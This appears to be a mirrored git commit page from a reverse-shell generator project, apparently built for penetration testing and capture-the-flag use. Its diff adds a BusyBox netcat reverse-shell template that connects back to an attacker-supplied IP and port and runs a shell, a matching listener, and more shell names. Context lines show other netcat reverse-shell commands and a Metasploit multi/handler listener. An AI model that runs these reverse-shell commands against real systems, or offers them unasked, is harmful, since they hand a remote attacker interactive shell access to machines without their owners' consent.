mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2024-12-18 19:06:09 +00:00
Added some busybox nc support. And added new shells.
This commit is contained in:
parent
50ba01a738
commit
7572a719f7
@ -60,6 +60,11 @@ const reverseShellCommands = withCommandType(
|
||||
"command": "nc.exe {ip} {port} -e {shell}",
|
||||
"meta": ["windows"]
|
||||
},
|
||||
{
|
||||
"name": "BusyBox nc -e",
|
||||
"command": "busybox nc {ip} {port} -e {shell}",
|
||||
"meta": ["linux"]
|
||||
},
|
||||
{
|
||||
"name": "nc -c",
|
||||
"command": "nc -c {shell} {ip} {port}",
|
||||
@ -455,6 +460,7 @@ const rsgData = {
|
||||
|
||||
listenerCommands: [
|
||||
['nc', 'nc -lvnp {port}'],
|
||||
['busybox nc', 'busybox nc -lp {port}'],
|
||||
['ncat', 'ncat -lvnp {port}'],
|
||||
['ncat.exe', 'ncat.exe -lvnp {port}'],
|
||||
['ncat (TLS)', 'ncat --ssl -lvnp {port}'],
|
||||
@ -469,7 +475,7 @@ const rsgData = {
|
||||
['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"']
|
||||
],
|
||||
|
||||
shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'pwsh', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh'],
|
||||
shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'pwsh', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh', 'mksh', 'dash'],
|
||||
|
||||
upgrade: ['python', ],
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user